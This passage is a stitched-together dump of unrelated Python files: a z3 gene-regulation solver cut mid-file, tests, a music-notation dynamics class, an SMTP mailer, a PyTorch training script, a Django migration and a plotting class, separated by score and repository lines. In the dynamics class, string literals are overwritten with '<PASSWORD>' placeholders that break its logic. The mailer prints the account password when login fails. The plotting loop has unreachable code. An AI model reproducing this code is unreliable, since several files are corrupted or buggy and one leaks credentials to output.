6: return Or( And(R == 0, A != 0, act & A == A), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A != 0, rep & R != R) ) elif num == 7: return Or( And(R == 0, act & A != 0), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A != 0, rep & R != R) ) elif num == 8: return And(A != 0, act & A == A) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A == A) ) elif num == 9: return Or( And(R == 0, act & A != 0), And(R != 0, A != 0, act & A == A) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A == A) ) elif num == 10: return Or( And(A != 0, act & A == A), And(R != 0, act & A != 0, rep & R == 0) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, Or(act & A == A, # And(act & A != 0, rep & R == 0))) ) elif num == 11: return Or( And(R == 0, A != 0, act & A != 0), And(R != 0, A != 0, Or(act & A == A, And(act & A != 0, rep & R == 0))) ) elif num == 12: return Or( And(A != 0, act & A == A), And(act & A != 0, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, Or(act & A == A, # And(act & A != 0, rep & R != R))) ) elif num == 13: return Or( And(R == 0, A != 0, act & A != 0), And(R != 0, A != 0, Or(act & A == A, And(act & A != 0, rep & R != R))) ) elif num == 14: return Or( And(R == 0, A != 0, act & A == A), And(R != 0, act & A != 0) ) #return Or( And(R == 0, A != 0, act & A == A), # And(R != 0, A != 0, act & A != 0) ) elif num == 15: return act & A != 0 #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A != 0) ) elif num == 16: return And(A == 0, rep & R != 0, rep & R != R) #return And(A == 0, R != 0, rep & R != 0, rep & R != R) elif num == 17: return And(A == 0, R != 0, rep & R == 0) else: print "Strange Num" raise ValueError def _with_kofe(kofe_idx, ko, fe, expr): koc, fec = kofe_idx if koc: ko = Extract(koc-1,koc-1,ko) == 1 # a trick to avoid 0 == False if fec: fe = Extract(fec-1,fec-1,fe) == 1 return Or(fe, And(Not(ko), expr)) else: return And(Not(ko), expr) elif fec: fe = Extract(fec-1,fec-1,fe) == 1 return Or(fe, expr) else: return expr def makeFunction(acts, reps, kofe_index, logic, A, R): ''' Makes a function that takes q, A, R, and return a coresponding z3 expr. A is the acticators-selecting bit-vector, R for repressors. ''' return lambda q, ko, fe: simplify( _with_kofe(kofe_index, ko, fe, _create_bit_rule(logic, [Extract(i,i,q) for i in acts], [Extract(i,i,q) for i in reps], A, R))) def isExpOf2(bvv): return len(filter(lambda x: x == '1', bin(bvv.as_long()))) == 1 ### Output Utilities ### ######################### boolf = BoolVal(False) def conv_time(secs, th = 300): if secs > th: return '%.1f min'%( secs / 60 ) return '%.1f sec'%secs def _Or(l): if(not l): return boolf if(len(l) == 1): return l[0] else: return Or(l); def _And(l): if(not l): return boolf if(len(l) == 1): return l[0] else: return And(l); def _create_sym_rule(num, act, rep): if num < -1 or num > 17: return Bool('Strang, num=%d, act=%s, rep=%s'%(num,str(act), str(rep))) if num == -1: return boolf if act: actt = [Bool(node) for node in act] if rep: rept = [Bool(node) for node in rep] if act: if not rep: if num%2 == 0: return _And(actt) else: return _Or(actt) elif num == 0: return boolf elif num == 1: return boolf elif(num < 4): return And(_Or(actt), Not(_Or(rept))) elif(num < 6): return And(_And(actt), Not(_And(rept))); elif(num < 8): return And(_Or(actt), Not(_And(rept))) elif(num < 10): return _And(actt) elif(num < 12): return Or(_And(actt), And(_Or(actt), Not(_Or(rept)))) elif(num < 14): return Or(_And(actt), And(_Or(actt), Not(_And(rept)))) elif(num < 16): return _Or(actt) else: return boolf if rep: if num == 16: return And(_Or(rept), Not(_And(rept))) elif num==17: return Not(_Or(rept)); else: return boolf else: return boolf # no act no rep def checkBit(i, bv): # simplify is necessary return simplify(Extract(i, i, bv)).as_long() == 1 def bv2logic(lbvv, llist): ''' convert a bit-vector to a integer, as logic function number.''' assert isExpOf2(lbvv) lcode = len(bin(lbvv.as_long()).lstrip('0b')) - 1 return llist[lcode] def bv2inters(ibvv, ilist, species): if is_true(simplify(ibvv == 0)): return [] assert is_false(simplify(ibvv == 0)) l = ibvv.size() - 1 return [species[c] for i, c in enumerate(ilist) if checkBit(l-i, ibvv)] def getDetail(m, A_, R_, L_, species, inters, logics): A = {}; R = {}; L = {} for c, s in enumerate(species): L[s] = bv2logic(m[L_[s]], logics[s]) if A_[s]: A[s] = bv2inters(m[A_[s]] or zero, inters[c][0], species) else: A[s] = [] if R_[s]: R[s] = bv2inters(m[R_[s]] or zero, inters[c][1], species) else: R[s] = [] return (A, R, L) def printModel(species, A, R, L, config = True, model = True): ''' Print the solved model nicely. ''' # printing the model if config: print ">>\tConfigurations: " for s in species: print ">>\t\t%s:%d%s%s" \ %(s, L[s], A[s] and '\t<- ' + ','.join(A[s]) or '', R[s] and '\t|- ' + ','.join(R[s]) or '') if model: print ">>\tModel: " for s in species: print ">>\t\t%s' = %s" \ %(s,simplify( _create_sym_rule(L[s], A[s], R[s]) )) from smtplib import SMTP, SMTPAuthenticationError from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText def mailMe(addr, pw, content, title = 'Computation Finished'): msg = MIMEMultipart('alternative') msg['Subject'] = title msg['From'] = msg['To'] = addr msg.attach(MIMEText(content, 'plain')) server = SMTP('smtp.qq.com') try: server.login(addr, pw) server.sendmail(addr, addr, msg.as_string()) server.quit() except SMTPAuthenticationError: print ">> SMTP: login fail with %s:%s"%(addr, pw)
2.484375
2
Archive for old stuff/BluetoothServer/Old/gatt-python.py
Kandidatarbete-Chalmers-MCCX02-19-06/RaspberryPiRadarProgram
7
12763051
import gatt class AnyDeviceManager(gatt.DeviceManager): def device_discovered(self, device): print("Discovered [%s] %s" % (device.mac_address, device.alias())) manager = AnyDeviceManager(adapter_name='hci0') manager.start_discovery() manager.run()
1.273438
1
models/__init__.py
doslindos/ml_crapwrap
0
12763179
from numpy import save as npsave, load as npload, array as nparray, append as npappend, expand_dims as npexpand, prod as npprod, argmax, zeros as npzeros from datetime import datetime from json import dump as jsondump, load as jsonload from pickle import dump as pkldump, load as pklload from inspect import signature from os import getcwd from collections import deque from sys import exit from pathlib import Path from sklearn import decomposition as skdecomposition, cluster as skcluster from utils.functions import run_function from utils.datasets import get_dataset_info from utils.modules import fetch_model, get_module from UI.GUI_utils import open_dirGUI from .util.model_handling_functions import save_configuration, save_weights, save_sk_model, load_weights, load_sk_model, load_configuration, handle_init, create_prediction_file, map_params, select_weights, read_prediction_file from .model_handler import ModelHandler
1.445313
1
tests/test_route.py
kr41/TraversalKit
4
12763307
<gh_stars>1-10 import re from traversalkit.route import Node, Route def test_node(): node = Node(object, name='foo') assert str(node) == 'foo' assert repr(node) == '<Node: foo>' assert node.type == 'single' node = Node(object, metaname='foo') assert str(node) == '{foo}' assert repr(node) == '<Node: {foo}>' assert node.type == 'set' node = Node(object, pattern=re.compile('.*')) assert str(node) == '{.*}' assert repr(node) == '<Node: {.*}>' assert node.type == 'set' node = Node(object) assert str(node) == '*' assert repr(node) == '<Node: *>' assert node.type == 'set' def test_path(): path = Route() assert path.uri == '*' assert repr(path) == '<Route: *>' assert len(path) == 0 path += Node(object, name='') assert path.uri == '/' assert repr(path) == '<Route: />' assert len(path) == 1 path += [Node(object, name='foo'), Node(object, metaname='bar')] assert path.uri == '/foo/{bar}/' assert repr(path) == '<Route: /foo/{bar}/>' assert len(path) == 3
2.15625
2
silx/opencl/test/test_sparse.py
physwkim/silx
2
12763435
<filename>silx/opencl/test/test_sparse.py #!/usr/bin/env python # coding: utf-8 # /*########################################################################## # # Copyright (c) 2018-2019 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ """Test of the sparse module""" import numpy as np import unittest import logging from itertools import product from ..common import ocl if ocl: import pyopencl.array as parray from silx.opencl.sparse import CSR try: import scipy.sparse as sp except ImportError: sp = None logger = logging.getLogger(__name__) def generate_sparse_random_data( shape=(1000,), data_min=0, data_max=100, density=0.1, use_only_integers=True, dtype="f"): """ Generate random sparse data where. Parameters ------------ shape: tuple Output data shape. data_min: int or float Minimum value of data data_max: int or float Maximum value of data density: float Density of non-zero elements in the output data. Low value of density mean low number of non-zero elements. use_only_integers: bool If set to True, the output data items will be primarily integers, possibly casted to float if dtype is a floating-point type. This can be used for ease of debugging. dtype: str or numpy.dtype Output data type """ mask = np.random.binomial(1, density, size=shape) if use_only_integers: d = np.random.randint(data_min, high=data_max, size=shape) else: d = data_min + (data_max - data_min) * np.random.rand(*shape) return (d * mask).astype(dtype) @unittest.skipUnless(ocl and sp, "PyOpenCl/scipy is missing") class TestCSR(unittest.TestCase): """Test CSR format""" def setUp(self): # Test possible configurations input_on_device = [False, True] output_on_device = [False, True] dtypes = [np.float32, np.int32, np.uint16] self._test_configs = list(product(input_on_device, output_on_device, dtypes)) def compute_ref_sparsification(self, array): ref_sparse = sp.csr_matrix(array) return ref_sparse def test_sparsification(self): for input_on_device, output_on_device, dtype in self._test_configs: self._test_sparsification(input_on_device, output_on_device, dtype) def _test_sparsification(self, input_on_device, output_on_device, dtype): current_config = "input on device: %s, output on device: %s, dtype: %s" % ( str(input_on_device), str(output_on_device), str(dtype) ) logger.debug("CSR: %s" % current_config) # Generate data and reference CSR array = generate_sparse_random_data(shape=(512, 511), dtype=dtype) ref_sparse = self.compute_ref_sparsification(array) # Sparsify on device csr = CSR(array.shape, dtype=dtype) if input_on_device: # The array has to be flattened arr = parray.to_device(csr.queue, array.ravel()) else: arr = array if output_on_device: d_data = parray.empty_like(csr.data) d_indices = parray.empty_like(csr.indices) d_indptr = parray.empty_like(csr.indptr) d_data.fill(0) d_indices.fill(0) d_indptr.fill(0) output = (d_data, d_indices, d_indptr) else: output = None data, indices, indptr = csr.sparsify(arr, output=output) if output_on_device: data = data.get() indices = indices.get() indptr = indptr.get() # Compare nnz = ref_sparse.nnz self.assertTrue( np.allclose(data[:nnz], ref_sparse.data), "something wrong with sparsified data (%s)" % current_config ) self.assertTrue( np.allclose(indices[:nnz], ref_sparse.indices), "something wrong with sparsified indices (%s)" % current_config ) self.assertTrue( np.allclose(indptr, ref_sparse.indptr), "something wrong with sparsified indices pointers (indptr) (%s)" % current_config ) def test_desparsification(self): for input_on_device, output_on_device, dtype in self._test_configs: self._test_desparsification(input_on_device, output_on_device, dtype) def _test_desparsification(self, input_on_device, output_on_device, dtype): current_config = "input on device: %s, output on device: %s, dtype: %s" % ( str(input_on_device), str(output_on_device), str(dtype) ) logger.debug("CSR: %s" % current_config) # Generate data and reference CSR array = generate_sparse_random_data(shape=(512, 511), dtype=dtype) ref_sparse = self.compute_ref_sparsification(array) # De-sparsify on device csr = CSR(array.shape, dtype=dtype, max_nnz=ref_sparse.nnz) if input_on_device: data = parray.to_device(csr.queue, ref_sparse.data) indices = parray.to_device(csr.queue, ref_sparse.indices) indptr = parray.to_device(csr.queue, ref_sparse.indptr) else: data = ref_sparse.data indices = ref_sparse.indices indptr = ref_sparse.indptr if output_on_device: d_arr = parray.empty_like(csr.array) d_arr.fill(0) output = d_arr else: output = None arr = csr.densify(data, indices, indptr, output=output) if output_on_device: arr = arr.get() # Compare self.assertTrue( np.allclose(arr.reshape(array.shape), array), "something wrong with densified data (%s)" % current_config ) def suite(): suite = unittest.TestSuite() suite.addTest( unittest.defaultTestLoader.loadTestsFromTestCase(TestCSR) ) return suite if __name__ == '__main__': unittest.main(defaultTest="suite")
1.414063
1
consort/tools/SimpleDynamicExpression.py
josiah-wolf-oberholtzer/consort
9
12763563
<filename>consort/tools/SimpleDynamicExpression.py<gh_stars>1-10 import abjad from abjad import attach from abjad import inspect from abjad import iterate from abjad import override from abjad.tools import abctools from abjad.tools import indicatortools from abjad.tools import instrumenttools from abjad.tools import selectiontools from abjad.tools import spannertools class SimpleDynamicExpression(abctools.AbjadValueObject): r'''A dynamic expression. .. container:: example :: >>> dynamic_expression = consort.SimpleDynamicExpression( ... hairpin_start_token='sfp', ... hairpin_stop_token='<PASSWORD>', ... ) :: >>> staff = abjad.Staff("c'8 d'8 e'8 f'8 g'8 a'8 b'8 c''8") >>> dynamic_expression(staff[2:-2]) >>> print(format(staff)) \new Staff { c'8 d'8 \override Hairpin.circled-tip = ##t e'8 \> \sfp f'8 g'8 \revert Hairpin.circled-tip a'8 \! b'8 c''8 } .. container:: example :: >>> dynamic_expression = consort.SimpleDynamicExpression( ... 'f', 'p', ... ) >>> staff = abjad.Staff("c'8 d'8 e'8 f'8 g'8 a'8 b'8 c''8") >>> dynamic_expression(staff[2:-2]) >>> print(format(staff)) \new Staff { c'8 d'8 e'8 \> \f f'8 g'8 a'8 \p b'8 c''8 } ''' ### CLASS VARIABLES ### __slots__ = ( '_hairpin_start_token', '_hairpin_stop_token', '_minimum_duration', ) ### INITIALIZER ### def __init__( self, hairpin_start_token='p', hairpin_stop_token=None, minimum_duration=abjad.Duration(1, 4), ): known_dynamics = indicatortools.Dynamic._dynamic_names assert hairpin_start_token in known_dynamics, \ (known_dynamics, hairpin_start_token) if hairpin_stop_token is not None: assert hairpin_stop_token in known_dynamics assert hairpin_start_token != '<PASSWORD>' or hairpin_stop_token != '<PASSWORD>' if hairpin_start_token == '<PASSWORD>': assert hairpin_stop_token is not None self._hairpin_start_token = hairpin_start_token self._hairpin_stop_token = hairpin_stop_token if minimum_duration is not None: minimum_duration = abjad.Duration(minimum_duration) self._minimum_duration = minimum_duration ### SPECIAL METHODS ### def __call__(self, music, name=None): if not isinstance(music, selectiontools.Selection): music = selectiontools.Selection(music) is_short_group = False if len(music) < 2: is_short_group = True elif self.minimum_duration is not None: if music.get_duration() < self.minimum_duration: is_short_group = True instrument = abjad.inspect(music[0]).get_effective( instrumenttools.Instrument, ) logical_ties = tuple(iterate(music).by_logical_tie(pitched=True)) if len(logical_ties) < 3: if instrument == instrumenttools.Piano() or \ instrument == instrumenttools.Percussion(): is_short_group = True grace_notes = None previous_leaf = abjad.inspect(music[0]).get_leaf(-1) if previous_leaf is not None: after_grace = abjad.inspect(previous_leaf).get_after_grace_container() if after_grace is not None: grace_notes = list(iterate(after_grace).by_leaf()) music = selectiontools.ContiguousSelect( tuple(grace_notes) + tuple(music), ) start_token = self.hairpin_start_token stop_token = self.hairpin_stop_token if is_short_group or stop_token is None: if start_token == '<PASSWORD>': start_token = stop_token if start_token.startswith('fp'): start_token = start_token[1:] command = indicatortools.LilyPondCommand(start_token, 'right') attach(command, music[0], name=name) return start_ordinal = NegativeInfinity if start_token != 'n<PASSWORD>': start_ordinal = indicatortools.Dynamic.dynamic_name_to_dynamic_ordinal( start_token) stop_ordinal = NegativeInfinity if stop_token != 'n<PASSWORD>': stop_ordinal = indicatortools.Dynamic.dynamic_name_to_dynamic_ordinal(stop_token) items = [] is_circled = False if start_ordinal < stop_ordinal: if start_token != 'n<PASSWORD>': items.append(start_token) else: is_circled = True items.append('<') items.append(stop_token) elif stop_ordinal < start_ordinal: items.append(start_token) items.append('>') if stop_token != 'n<PASSWORD>': items.append(stop_token) else: #items.append('!') is_circled = True hairpin_descriptor = ' '.join(items) hairpin = spannertools.Hairpin( descriptor=hairpin_descriptor, include_rests=False, ) if is_circled: override(hairpin).hairpin.circled_tip = True attach(hairpin, music, name=name) ### PUBLIC PROPERTIES ### @property def hairpin_start_token(self): return self._hairpin_start_token @property def hairpin_stop_token(self): return self._hairpin_stop_token @property def minimum_duration(self): return self._minimum_duration
1.773438
2
remove_duplicates.py
AnneliektH/EVEs_arthropod
0
12763691
<reponame>AnneliektH/EVEs_arthropod #<NAME>, 2017 # load pandas import pandas as pd import sys # load dataframe df = pd.DataFrame.from_csv(sys.argv[1]) # sort on postion query start to keep highest later on df.sort_values('position_on_query_start', inplace=True) # drop duplicates based on start and direction keep first so highest df.drop_duplicates(["direction", "position_on_query_start"], inplace=True, keep="first") # sort on postion query stop to keep highest later on df.sort_values("position_on_query_stop", inplace=True) # drop duplicates based on stop and direction keep first so highest df.drop_duplicates(["direction", "position_on_query_stop"], inplace=True, keep="first") print len(df) # show dataframe df.to_csv(sys.argv[2])
2.203125
2
mail.py
FilippoRanza/mail.py
0
12763819
<gh_stars>0 #! /usr/bin/python3 # Copyright (c) 2019 <NAME> <<EMAIL>> from argparse import ArgumentParser from mail_sender import message_builder, load_destination DEFAULT_SUBJECT = "A message from mail.py" DEFAULT_CONFIG_FILE = "/etc/mail_config.json" def setup_argparser(): out = ArgumentParser() out.add_argument('-d', '--destination', required=True, nargs='+', help='''Set destination addresse[es], this argument can be a file in this case adress[es] are read from it, addresses are line or spece separated''') out.add_argument('-s', '--subject', default=DEFAULT_SUBJECT, help='specify subject') out.add_argument('-c', '--config', default=DEFAULT_CONFIG_FILE, help='specify configuration file') out.add_argument('-a', '--attachment', default=None, nargs='+', help='add attachment file, just one') out.add_argument('-f', '--file', default=None, help="specify message file") return out def main(): parser = setup_argparser() args = parser.parse_args() if args: mail = message_builder(args.config, args.attachment, args.subject, args.file) dst = load_destination(args.destination) mail.send_mail(dst) if __name__ == "__main__": main()
1.664063
2
where/cleaners/removers/__init__.py
ingridfausk/where
16
12763947
<gh_stars>10-100 """Framework for removing observations Description: ------------ Each remover should be defined in a separate .py-file. The function inside the .py-file that should be called needs to be decorated with the :func:`~midgard.dev.plugins.register` decorator as follows:: from midgard.dev import plugins @plugins.register def ignore_station(dset): ... """ # Standard library imports from typing import Any, Dict # External library imports import numpy as np # Midgard imports from midgard.dev import plugins # Where imports from where.lib import config from where.lib import log def apply_removers(config_key: str, dset: "Dataset") -> None: """Apply all removers for a given session Args: config_key: The configuration key listing which removers to apply. dset: Dataset containing analysis data. """ prefix = dset.vars["pipeline"] removers = config.tech[config_key].list log.info(f"Applying removers") keep_idxs = plugins.call_all(package_name=__name__, plugins=removers, prefix=prefix, dset=dset) all_keep_idx = np.ones(dset.num_obs, dtype=bool) for remover, remover_keep_idx in keep_idxs.items(): log.info(f"Removing {sum(np.logical_not(remover_keep_idx)):5d} observations based on {remover}") all_keep_idx = np.logical_and(all_keep_idx, remover_keep_idx) log.info(f"Keeping {sum(all_keep_idx)} of {dset.num_obs} observations") dset.subset(all_keep_idx) if dset.num_obs == 0: log.fatal("No observations are available.") def apply_remover(remover: str, dset: "Dataset", **kwargs: Dict[Any, Any]) -> None: """Apply defined remover for a given session Args: remover: The remover name. dset: Dataset containing analysis data. kwargs: Input arguments to the remover. """ log.info(f"Apply remover {remover!r}") keep_idx = plugins.call(package_name=__name__, plugin_name=remover, dset=dset, **kwargs) log.info(f"Keeping {sum(keep_idx)} of {dset.num_obs} observations") dset.subset(keep_idx) if dset.num_obs == 0: log.fatal("No observations are available.")
1.914063
2
bld/libs/builder/src/steps/copyfilestep.py
webbers/dongle.net
2
12764075
<reponame>webbers/dongle.net<filename>bld/libs/builder/src/steps/copyfilestep.py import os import distutils.file_util from steps.abstractstep import * class CopyFileStep(AbstractStep): """Copy File Step""" def __init__( self, srcFile, destFile, overwrite = 1, makeDir = 1 ): AbstractStep.__init__( self, "Copy File" ) self.srcFile = srcFile self.destFile = destFile self.overwrite = overwrite self.makeDir = makeDir def do( self ): self.reporter.message( "COPY FILE: %s => %s" % ( self.srcFile, self.destFile ) ) result = distutils.file_util.copy_file(self.srcFile, self.destFile) #result = StCommon.CopyFile( self.srcFile, self.destFile, self.overwrite, self.makeDir ) return result
1.398438
1
scripts/train.py
CrhistyanSilva/localbitsback
0
12764203
# !/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function import argparse import datetime import json import math import os import random import time import numpy as np import torch import torch.optim as optim import torch.utils.data import compression from compression.utils import load_imagenet_data from optimization.training import train, evaluate random.seed(7610) parser = argparse.ArgumentParser(description='PyTorch Discrete Normalizing flows') parser.add_argument('--imagenet64_data_path', type=str, default='~/data/imagenet-small/train_64x64.npy') parser.add_argument('--imagenet64_valid_data_path', type=str, default='~/data/imagenet-small/valid_64x64.npy') parser.add_argument('--imagenet64_model', type=str, default=None) parser.add_argument('--state_parameters', type=str, default=None) parser.add_argument('--from_torch', action="store_true") parser.add_argument('--manual_seed', type=int, help='manual seed, if not given resorts to random seed.') parser.add_argument('--evaluate_interval_epochs', type=int, default=5, help='Evaluate per how many epochs') parser.add_argument('--snap_images', type=int, default=100000, help='Number of images to process on training before save snapshots') parser.add_argument('-od', '--out_dir', type=str, default='./', help='output directory for model snapshots etc.') # optimization settings parser.add_argument('-e', '--epochs', type=int, default=100, metavar='EPOCHS', help='number of epochs to train (default: 2000)') parser.add_argument('-bs', '--batch_size', type=int, default=2, metavar='BATCH_SIZE', help='input batch size for training (default: 100)') parser.add_argument('-lr', '--learning_rate', type=float, default=0.00001, metavar='LEARNING_RATE', help='learning rate') parser.add_argument('--step_size', default=10000, type=float, help='Number of batch iteration to update the learning rate') parser.add_argument('--gamma', default=0.1, type=float, help='Multiplicative factor of learning rate decay') args = parser.parse_args() if args.manual_seed is None: args.manual_seed = random.randint(1, 100000) random.seed(args.manual_seed) torch.manual_seed(args.manual_seed) np.random.seed(args.manual_seed) def run(args): print('\nMODEL SETTINGS: \n', args, '\n') print("Random Seed: ", args.manual_seed) # ================================================================================================================== # SNAPSHOTS # ================================================================================================================== args.model_signature = str(datetime.datetime.now())[0:19].replace(' ', '_') args.model_signature = args.model_signature.replace(':', '_') os.makedirs(args.out_dir, exist_ok=True) snap_dir = args.out_dir with open(os.path.join(snap_dir, 'log.txt'), 'a') as ff: print('\nMODEL SETTINGS: \n', args, '\n', file=ff) # SAVING torch.save(args, snap_dir + '.config') # Load snapshot parameters parameters_dict = None if args.state_parameters is not None: assert os.path.isfile(args.state_parameters) parameters_dict = json.load(open(args.state_parameters)) args.learning_rate = parameters_dict['scheduler']['_last_lr'][0] args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print('Device:', args.device) # ================================================================================================================== # LOAD DATA # ================================================================================================================== dataset = load_imagenet_data(os.path.expanduser(args.imagenet64_data_path)) validation_dataset = load_imagenet_data(os.path.expanduser(args.imagenet64_valid_data_path)) train_loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=True, drop_last=False) val_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False) # test_loader = torch.utils.data.DataLoader( # dataset, # batch_size=args.batch_size, # shuffle=False, # **kwargs) args.input_size = [3, 64, 64] # ================================================================================================================== # SELECT MODEL # ================================================================================================================== # flow parameters and architecture choice are passed on to model through args print(args.input_size) from compression.models.load_flowpp_imagenet64 import Imagenet64Model # Load model if args.imagenet64_model is None: model = Imagenet64Model(force_float32_cond=True).eval() else: model_ctor = compression.models.load_imagenet64_model model_filename = os.path.expanduser(args.imagenet64_model) model = model_ctor(model_filename, force_float32_cond=True, from_torch=args.from_torch) model.to(device=args.device) model_sample = model optimizer = optim.Adam(model.parameters(), lr=args.learning_rate) scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args.step_size, gamma=args.gamma) # ================================================================================================================== # TRAINING # ================================================================================================================== train_bpd = [] val_bpd = [] # for early stopping best_val_bpd = np.inf best_val_loss = np.inf if args.state_parameters is None: last_epoch = 1 run_number = 1 else: last_epoch = parameters_dict['epoch'] run_number = parameters_dict['run_number'] + 1 scheduler.load_state_dict(parameters_dict['scheduler']) train_times = [] model.double() for epoch in range(last_epoch, args.epochs + 1): t_start = time.time() if parameters_dict is not None: tr_loss, tr_bpd = train(epoch, train_loader, model, optimizer, args, scheduler, True, parameters_dict['batch_idx'], run_number) else: tr_loss, tr_bpd = train(epoch, train_loader, model, optimizer, args, scheduler, False) train_bpd.append(tr_bpd) train_times.append(time.time() - t_start) print('One training epoch took %.2f seconds' % (time.time() - t_start)) if epoch < 5 or epoch % args.evaluate_interval_epochs == 0: v_loss, v_bpd = evaluate( val_loader, model, model_sample, args, epoch=epoch, file=snap_dir + 'log.txt') val_bpd.append(v_bpd) best_val_bpd = min(v_bpd, best_val_bpd) best_val_loss = min(v_loss, best_val_loss) print('(BEST: val bpd {:.4f}, val loss {:.4f})\n'.format(best_val_bpd, best_val_loss)) print(f'VALIDATION: loss: {v_loss}, bpd: {v_bpd}') if math.isnan(v_loss): raise ValueError('NaN encountered!') train_bpd = np.hstack(train_bpd) val_bpd = np.array(val_bpd) # training time per epoch train_times = np.array(train_times) mean_train_time = np.mean(train_times) std_train_time = np.std(train_times, ddof=1) print('Average train time per epoch: %.2f +/- %.2f' % (mean_train_time, std_train_time)) # ================================================================================================================== # EVALUATION # ================================================================================================================== final_model = torch.load(snap_dir + 'a.model') test_loss, test_bpd = evaluate( train_loader, test_loader, final_model, final_model, args, epoch=epoch, file=snap_dir + 'test_log.txt') print('Test loss / bpd: %.2f / %.2f' % (test_loss, test_bpd)) if __name__ == "__main__": run(args)
1.9375
2
Gallery/migrations/0011_auto_20210225_0853.py
CiganOliviu/InfiniteShoot
1
12764331
# Generated by Django 3.0.8 on 2021-02-25 08:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('Gallery', '0010_pickedimage'), ] operations = [ migrations.RemoveField( model_name='pickedimage', name='cover_image', ), migrations.AddField( model_name='pickedimage', name='cover_image', field=models.ManyToManyField(to='Gallery.ImagesClient'), ), ]
0.8125
1
src/plotting/figure3.py
UMCUGenetics/svMIL
0
12764459
<filename>src/plotting/figure3.py<gh_stars>0 import sys import numpy as np import matplotlib.pyplot as plt from sklearn.ensemble import RandomForestClassifier import random from scipy import stats from statsmodels.sandbox.stats.multicomp import multipletests import os import os.path import pandas as pd import seaborn as sns from matplotlib.colors import ListedColormap import matplotlib matplotlib.use('Agg') class Figure3: """ Class for plotting figure 3A and 3B. """ def generateHeatmap(self, cancerTypes, loopType, svTypes = ['DEL', 'DUP', 'INV', 'ITX']): """ Handler for generating the feature significance heatmap for all cancer types. First, per cancer type, get the instances and their importance ranking from the random forest. Then compute the significance of the top 100 to 100 randomly sampled instances. Then gather the information in a dictionary and provide it to the plotting function to generate the heatmap. Parameters: - cancerTypes: list of cancer types to run for. These should correspond to the output folder names. - loopType: either TAD or CTCF, used to create output files with different titles. - svTypes: svTypes to use per cancer type. Defaults to all SV types. """ #get the significances for each cancer type pValuesPerCancerType = dict() for cancerType in cancerTypes: print('Processing cancer type: ', cancerType) #first get the instances and their ranking across all SV types importances, instances = self.getFeatureImportances(svTypes, cancerType) #then compute the significances of the top 100 to random 100 instances pValues, zScores = self.computeFeatureSignificances(importances, instances, 100) pValuesPerCancerType[cancerType] = [pValues, zScores] #then make a heatmap plot of the significances. self.plotHeatmap(pValuesPerCancerType, loopType) def plotHeatmap(self, pValuesPerCancerType, loopType): """ Plot the heatmap showing the signficances of each feature (columns) in each cancer type (rows). P-values are binarized into very significant (1e-5) and significant ( < 0.05). These are further binarized into z > 0 and z < 0 to indicate gains and losses of features. Parameters: - pValuesPerCancerType: dictionary with cancer types as keys and the adjusted p-values and z-scores from computeFeatureSignificances as entry 0 and 1. """ #re-format the p-values to a binary style for plotting significanceMatrix = [] shortCancerTypeNames = [] for cancerType in pValuesPerCancerType: #get the short name of the cancer type for plotting clarity splitCancerType = cancerType.split('_') shortCancerType = '_'.join(splitCancerType[1:2]) if loopType == 'CTCF': shortCancerType += '_CTCF' shortCancerTypeNames.append(shortCancerType) significances = [] pValues = pValuesPerCancerType[cancerType][0] zScores = pValuesPerCancerType[cancerType][1] #below this we call it 'very' significant. signCutoff = 1e-5 for pValueInd in range(0, len(pValues)): pValue = pValues[pValueInd] significances.append(zScores[pValueInd]) continue if pValue < 0.05 and zScores[pValueInd] > 0: if zScores[pValueInd] > signCutoff: significances.append(2) else: significances.append(1) elif pValue < 0.05 and zScores[pValueInd] < 0: if zScores[pValueInd] < signCutoff: significances.append(-2) else: significances.append(-1) else: significances.append(0) significanceMatrix.append(significances) significanceMatrix = np.array(significanceMatrix) #np.save('signMatrix.npy', significanceMatrix) #print(significanceMatrix) fig =plt.figure(figsize=(15,10)) data = pd.DataFrame(significanceMatrix) #exclude translocations, these are not there for germline. g=sns.heatmap(data,annot=False,square=True, linewidths=0.5, #cmap=ListedColormap(['#0055d4ff', '#0055d47d', '#f7f6f6ff', '#c8373780', '#c83737ff']), cmap="vlag", center=0, yticklabels=shortCancerTypeNames) g.set_yticklabels(g.get_yticklabels(), horizontalalignment='right',fontsize='small') plt.xticks(np.arange(0, significanceMatrix.shape[1])+0.5, ['Gains', 'Losses', 'CpG', 'TF', 'CTCF', 'DNAseI', 'h3k4me3', 'h3k27ac', 'h3k27me3', 'h3k4me1', 'CTCF', 'CTCF+Enhancer', 'CTCF+Promoter', 'Enhancer', 'Heterochromatin', 'Poised_Promoter', 'Promoter', 'Repressed', 'Transcribed', 'RNA pol II', 'CTCF strength', 'RNA pol II strength', 'h3k4me3 strength', 'h3k27ac strength', 